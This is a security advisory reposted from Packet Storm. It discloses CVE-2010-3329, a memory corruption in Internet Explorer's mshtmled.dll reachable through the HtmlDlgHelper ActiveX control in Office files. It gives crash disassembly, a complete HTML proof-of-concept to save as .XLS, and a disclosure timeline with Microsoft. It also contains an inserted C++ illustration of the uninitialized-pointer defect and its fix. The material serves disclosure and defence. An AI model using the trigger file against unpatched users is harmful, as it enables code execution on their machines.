Source: Packet Storm (PACKETSTORM:94815)

Core Security Technologies Advisory 2010.0517

2010-10-15 00:00:00
Core Security Technologies
packetstormsecurity.com

Core Security Technologies - CoreLabs Advisory  
http://corelabs.coresecurity.com  
  
Microsoft Office HtmlDlgHelper class memory corruption  
  
  
1. *Advisory Information*  
  
Title: Microsoft Office HtmlDlgHelper class memory corruption  
Advisory Id: CORE-2010-0517  
Advisory URL:  
[http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption]  
Date published: 2010-10-12  
Date of last update: 2010-10-14  
Vendors contacted: Microsoft  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: Missing Initialization [CWE-456]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2010-3329  
Bugtraq ID: N/A  
  
  
3. *Vulnerability Description*  
  
Microsoft Windows is prone to a memory corruption vulnerability when  
instantiating the 'HtmlDlgHelper Class Object' in a Microsoft Office  
document (i.e. .XLS, .DOC). The affected vulnerable module is part of  
Internet Explorer ('mshtmled.dll'). This vulnerability could be used by  
a remote attacker to execute arbitrary code with the privileges of the  
user that opened the malicious file.  
  
  
4. *Vulnerable packages*  
  
. IE 6  
. IE 7  
. IE 8  
. MS Office XP  
. MS Office 2003  
. MS Office 2007 and MS Office 2010 (the control is disabled by default)  
  
  
5. *Non-vulnerable packages*  
  
. For further information and patches about this issue look at the  
Microsoft Security Bulletin Summary for October 2010 [1], patch ms10-071.  
  
  
6. *Credits*  
  
This vulnerability was discovered by Damian Frizza from Core Security  
Technologies.  
  
  
7. *Technical Description / Proof of Concept Code*  
  
Microsoft Windows is prone to a memory corruption vulnerability when  
instantiating the 'HtmlDlgHelper Class Object'  
('CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b') in a Microsoft Office  
document (i.e. .XLS, .DOC). The affected vulnerable module is part of  
Internet Explorer ('mshtmled.dll'). The vulnerability occurs in  
'mshtmled.dll' when the destructor of the 'CHtmlDlgHelper' class is  
called and then accesses uninitialized memory.  
  
The ActiveX control is marked as "Not Safe for Initialization", and  
prompts the user with: "ActiveX controls might contain viruses or other  
security hazards. Do not enable this content unless you trust the source  
of this file". However, in Office 2003 the bug is triggered even if the  
user answers "No" to the prompt.  
  
The following code is where the vulnerability occurs, when opening a  
.XLS document on Microsoft Office Excel 2003 ('mshtmled.dll'  
v8.0.6001.18702):  
  
/-----  
mshtmled!ReleaseInterface:  
42b919c0 8bff     mov  edi,edi  
42b919c2 55       push ebp  
42b919c3 8bec     mov  ebp,esp  
42b919c5 8b4508   mov  eax,dword ptr [ebp+8]  ss:0023:0013d104=00310065  
42b919c8 85c0     test eax,eax  
42b919ca 7406     je   mshtmled!ReleaseInterface+0x12 (42b919d2)  [br=0]  
42b919cc 8b08     mov  ecx,dword ptr [eax]  ds:0023:00310065  
42b919ce 50       push eax  
42b919cf ff5108   call dword ptr [ecx+8]  ds:0023:7d02029c=2a2c277a  
  
eax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc edi=00000000  
eip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0  nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  efl=00000206  
  
Stack Trace:  
<Unloaded_ion.dll>+0x2a2c2779  
mshtmled!ReleaseInterface+0x12  
mshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10  
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting destructor'+0xd  
mshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27  
VBE6!rtcStrConvVar+0xbd65  
VBE6!rtcSetDatabaseLcid+0xa823  
EXCEL!Ordinal41+0xd2ad0  
EXCEL!Ordinal41+0x14082a  
USER32!CallWindowProcW+0x1b  
Instruction Address: 0x000000002a2c277a  
-----/  
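As an added illustration (not code from the advisory, from mshtmled.dll or from Core), the following C++ model shows the defect class described above: an interface-pointer member that the destructor hands to a ReleaseInterface-style helper although no constructor ever set it. The helper's null check (test eax,eax / je) cannot catch a stale non-zero value such as the eax=00310065 in the crash, which looks like two UTF-16 characters ('e', '1') rather than an object pointer, so the vtable call at [ecx+8] (the third COM slot, Release) goes through garbage; the corrected class defines the member before any path can release it. All type and function names below are hypothetical.

```cpp
// Illustrative model of the CWE-456 pattern (not mshtmled.dll code): a COM-style
// interface pointer that the destructor releases but no constructor ever initialised.
#include <cstdint>
#include <cstring>
#include <new>

struct IUnknownLike {                               // COM vtable order on 32-bit x86:
    virtual long QueryInterface() { return 0; }     //   slot 0, [ecx+0]
    virtual unsigned long AddRef() { return 0; }    //   slot 1, [ecx+4]
    virtual unsigned long Release() = 0;            //   slot 2, [ecx+8], the call in the crash
};
struct CountedObject : IUnknownLike {
    unsigned long refs = 1;
    unsigned long Release() override { return --refs; }
};

// Same shape as the disassembled helper: null check, then call through the vtable.
// Any non-null garbage passes the check and becomes a call through a wild pointer.
static void ReleaseInterface(IUnknownLike* p) {
    if (p) p->Release();
}

struct HelperUninit {                               // flawed: indeterminate until Init()
    IUnknownLike* m_pHelper;
    HelperUninit() {}                               // does not touch m_pHelper
    void Init(IUnknownLike* p) { m_pHelper = p; }
    ~HelperUninit() { ReleaseInterface(m_pHelper); } // garbage if Init() never ran
};

struct HelperFixed {                                // fix: every path sees a defined value
    IUnknownLike* m_pHelper = nullptr;
    void Init(IUnknownLike* p) { m_pHelper = p; }
    ~HelperFixed() { ReleaseInterface(m_pHelper); }
};

// Constructs T in storage pre-filled with a constructed 0x41 pattern (standing in for
// whatever an earlier allocation left behind), skips Init(), and returns the raw bytes
// the destructor would hand to ReleaseInterface. The destructor itself is not run.
template <typename T>
static uintptr_t PointerSeenByDestructor() {
    alignas(T) unsigned char storage[sizeof(T)];
    std::memset(storage, 0x41, sizeof storage);
    T* obj = new (storage) T();
    uintptr_t raw;
    std::memcpy(&raw, &obj->m_pHelper, sizeof raw);
    return raw;
}

static unsigned long RefsAfterScopedRelease() {
    CountedObject obj;                              // refs == 1, owned by the holder
    { HelperFixed h; h.Init(&obj); }                // ~HelperFixed -> Release(), exactly once
    return obj.refs;                                // 0
}
```

For the flawed class the bytes seen by the destructor are the 0x41 fill, a non-null value that ReleaseInterface would call through; for the fixed class they are zero and the helper returns without dereferencing anything.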
  
  
The following HTML code demonstrates the bug on Excel 2002/2003. Save  
the file as .XLS and open it in Excel.  
  
/-----  
<html xmlns:v="urn:schemas-microsoft-com:vml"  
xmlns:o="urn:schemas-microsoft-com:office:office"  
xmlns:x="urn:schemas-microsoft-com:office:excel">  
  
<head>  
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">  
<meta name=ProgId content=Excel.Sheet>  
<meta name=Generator content="Microsoft Excel 10">  
<!--[if !mso]>  
<style>  
v\:* {behavior:url(#default#VML);}  
o\:* {behavior:url(#default#VML);}  
x\:* {behavior:url(#default#VML);}  
.shape {behavior:url(#default#VML);}  
</style>  
<![endif]--><!--[if gte mso 9]><xml>  
<o:DocumentProperties>  
<o:LastAuthor>TEST</o:LastAuthor>  
<o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>  
<o:Version>10.6858</o:Version>  
</o:DocumentProperties>  
<o:OfficeDocumentSettings>  
<o:DownloadComponents/>  
</o:OfficeDocumentSettings>  
</xml><![endif]-->  
  
<!--[if gte mso 9]><xml>  
<x:ExcelWorkbook>  
<x:ExcelWorksheets>  
<x:ExcelWorksheet>  
<x:Name>test</x:Name>  
<x:WorksheetOptions>  
<x:CodeName>Sheet1</x:CodeName>  
<x:Selected/>  
<x:DoNotDisplayGridlines/>  
<x:ProtectContents>False</x:ProtectContents>  
<x:ProtectObjects>False</x:ProtectObjects>  
<x:ProtectScenarios>False</x:ProtectScenarios>  
</x:WorksheetOptions>  
</x:ExcelWorksheet>  
</x:ExcelWorksheets>  
<x:WindowHeight>9345</x:WindowHeight>  
<x:WindowWidth>13260</x:WindowWidth>  
<x:WindowTopX>240</x:WindowTopX>  
<x:WindowTopY>60</x:WindowTopY>  
<x:ProtectStructure>False</x:ProtectStructure>  
<x:ProtectWindows>False</x:ProtectWindows>  
</x:ExcelWorkbook>  
</xml><![endif]--><!--[if gte mso 9]><xml>  
<o:shapedefaults v:ext="edit" spidmax="1026"/>  
</xml><![endif]--><!--[if gte mso 9]><xml>  
<o:shapelayout v:ext="edit">  
<o:idmap v:ext="edit" data="1"/>  
</o:shapelayout></xml><![endif]-->  
</head>  
  
<body link=blue vlink=purple>  
  
<table x:str border=0 cellpadding=0 cellspacing=0 width=64  
style='border-collapse:  
collapse;table-layout:fixed;width:48pt'>  
<col width=64 style='width:48pt'>  
<tr height=17 style='height:12.75pt'>  
<td height=17 width=64 style='height:12.75pt;width:48pt' align=left  
valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201"  
coordsize="21600,21600"  
o:spt="201" path="m,l,21600r21600,l21600,xe">  
<v:stroke joinstyle="miter"/>  
<v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"  
o:connecttype="rect"/>  
<o:lock v:ext="edit" shapetype="t"/>  
</v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201"  
style='position:absolute;  
margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'  
strokecolor="windowText [64]" o:insetmode="auto">  
<![if gte mso 9]><o:title=""/>  
<![endif]><x:ClientData ObjectType="Pict">  
<x:SizeWithCells/>  
<x:CF>Pict</x:CF>  
<x:AutoPict/>  
</x:ClientData>  
</v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;  
position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;  
height:17px'><![endif]>  
  
<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B"  
id=obj></object>  
  
<![if !vml]></span><![endif]><span  
style='mso-ignore:vglayout2'>  
<table cellpadding=0 cellspacing=0>  
<tr>  
<td height=17 width=64 style='height:12.75pt;width:48pt'></td>  
</tr>  
</table>  
</span></td>  
</tr>  
<![if supportMisalignedColumns]>  
<tr height=0 style='display:none'>  
<td width=64 style='width:48pt'></td>  
</tr>  
<![endif]>  
</table>  
</body>  
</html>  
  
-----/  
  
  
This exploitable condition was reproduced in the following versions of  
'mshtmled.dll':  
  
. 'mshtmled.dll' v8.0.6001.18702  
. 'mshtmled.dll' v8.0.6001.18000  
. 'mshtmled.dll' v7.0.6000.17023  
. 'mshtmled.dll' v7.0.6000.17080  
  
  
8. *Report Timeline*  
  
. 2010-05-28:  
Initial notification to the vendor. Draft advisory and proof-of-concept  
files sent to MSRC. Publication date set for July 13, 2010.  
  
. 2010-06-11:  
Core requests from the vendor an update on the status of this case.  
  
. 2010-06-14:  
The vendor responds that its engineers are still investigating this  
issue; and that they expect to have more information from the  
investigation and triage process within the next few days.  
  
. 2010-06-15:  
The vendor informs that it has determined that the ActiveX control is  
marked as "Not Safe for Initialization" and prompts the user with a  
dialog warning that they are about to execute potentially malicious  
code. In consequence, the vendor treats this case as the same scenario  
as a user who chooses to enable and open an Office document containing  
Macro or VBA code.  
  
. 2010-06-15:  
Core asks the vendor whether the previous mail means that it does not  
intend to fix the bug, or that it does not recognize it as a security  
issue. The reporter's viewpoint is that a dialog prompt is not a fix per  
se but only a defense-in-depth mechanism, and that he would prefer to see  
the bug fixed rather than relying on mitigations that prevent exploitation.  
  
. 2010-06-15:  
Core adds the following information: in Office 2003 even if the user  
answers No to the ActiveX dialog, the application ends up crashing.  
  
. 2010-06-16:  
Vendor responds that it is currently investigating the new information.  
  
. 2010-06-28:  
Vendor informs that it has found that the vulnerable code does exist and  
is owned by the IE team, which is currently investigating the crash, and  
that this case is transferred over to them (and to a new case manager as  
well).  
  
. 2010-07-02:  
Vendor informs Core that the IE team has finished the investigation into  
this issue and was able to reproduce the issue reported. During the  
investigation it was determined that this is an exploitable crash in  
Internet Explorer. Vendor will send Core the list of affected Internet  
Explorer versions when available.  
  
. 2010-07-02:  
Core acknowledges receipt of the update, and reminds that although the  
vulnerable code is owned by the IE team this also affects Office  
(including 2010). Core offers to postpone publication of its advisory  
from July 13th to August 10th on the basis of a firm commitment to a  
release date from the vendor's side. Core informs that it is evaluating  
the possibility of using the Office killbit recently introduced by  
MS10-036 as a workaround, but that MS10-036 points to a knowledge base  
article [2] that is no longer available.  
  
. 2010-07-07:  
Vendor acknowledges previous mail, and states that it will determine  
with the product team how this fix could be included in the August  
release. Vendor requests an updated version of the advisory, and to  
include a vendor statement.  
  
. 2010-07-22:  
Core requests an update on the status of the vulnerability report; and  
informs that publication of its advisory has been rescheduled to August  
10, 2010, despite the fact that Core did not receive any updates. Core  
informs that the publication of this advisory is transferred to a new  
case manager.  
  
. 2010-08-04:  
Core sends an updated version of the advisory and also asks if MSRC can  
provide:  
1. The list of affected software versions.  
2. The CVE number assigned to this vulnerability (if it exists).  
3. The steps to reproduce the vulnerability in IE [3].  
4. The link to the knowledge base article about the newly introduced  
Office killbit given that Core is investigating using that defense  
mechanism as a workaround but MS10-036 points to a knowledge base  
article that is no longer available  
([http://support.microsoft.com/kb/983632]).  
  
Core also notifies that this advisory is currently scheduled to be  
published on August 10, 2010, but that the publication date can be  
reviewed if Microsoft responds with a firm commitment to a release date  
for fixes and technical information about the root cause of this  
vulnerability.  
  
. 2010-08-04:  
MSRC responds that the updated advisory draft was internally forwarded  
and they are working on collecting answers to the requested questions.  
  
. 2010-08-05:  
MSRC sends the answers to the asked questions:  
1. The affected versions of Internet Explorer are IE6 [4], IE7 and IE8.  
2. MSRC is unable to assign a CVE as it is too early. CVEs are  
typically assigned closer to the scheduled release date and MSRC will  
receive the block of CVEs from Mitre for the October release of the  
Internet Explorer security update.  
3. MSRC notifies that there is no attack vector in IE, and that they  
cannot provide steps to reproduce the vulnerability in IE.  
4. The knowledge base article about the newly introduced Office  
killbit was redirected to [http://support.microsoft.com/kb/2252664].  
  
. 2010-08-06:  
Core asks MSRC to clarify if the fix for this issue has been scheduled  
to be released in October.  
  
. 2010-08-06:  
MSRC confirms that the fix for this issue is scheduled for the October  
release of IE.  
  
. 2010-08-09:  
Core re-schedules the publication of the advisory for October 12 and  
notifies that this date should be considered final; if Microsoft does  
not release fixes on that date, the advisory will be released as a  
'user release'.  
  
. 2010-08-09:  
MSRC confirms that the fix for this issue is scheduled for the October  
release of IE.  
  
. 2010-10-01:  
MSRC provides a status update about this issue and notifies that it is  
slated to be included in the October release of the IE Cumulative Update  
and SafeHTML update scheduled for October 12, 2010. MSRC also notifies  
that the CVE assigned to this issue is CVE-2010-3329.  
  
. 2010-10-01:  
MSRC notifies that they have made a mistake and included an invalid  
detail in the last status update. In particular, the issue does not  
affect the SafeHTML update scheduled for October but it will be shipping  
in the IE Cumulative Update scheduled for October.  
  
. 2010-10-01:  
Core acknowledges the MSRC's e-mail and notifies that although the  
problem is located in IE-owned code, the problem also affects Office up  
to 2010. Core assumes this will be specified in the MSRC bulletin and  
asks for confirmation.  
  
. 2010-10-04:  
MSRC confirms that the description of the vulnerability calls out that  
the vector to the vulnerability is through opening a Word document.  
  
. 2010-10-12:  
Advisory CORE-2010-0517 is published.  
  
  
9. *References*  
  
[1] Microsoft security bulletin summary for October 2010 -  
[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx].  
[2] Office killbit [http://support.microsoft.com/kb/983632].  
[3] This bug was originally investigated in Microsoft Office by Core,  
but MSRC determined [2010-07-02] that this bug is an exploitable crash  
in Internet Explorer.  
[4] MSRC was not able to reproduce this issue on IE6; however, it  
notifies that the code has been determined to exist in this version and  
that the fix will be scoped to address this platform as well.  
  
  
10. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
[http://corelabs.coresecurity.com/].  
  
  
11. *About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources are  
exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and software  
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core  
Security Technologies can be reached at 617-399-6980 or on the Web at  
[http://www.coresecurity.com].  
  
  
12. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2010 Core Security  
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative  
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)  
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]  
  
  
13. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].  
  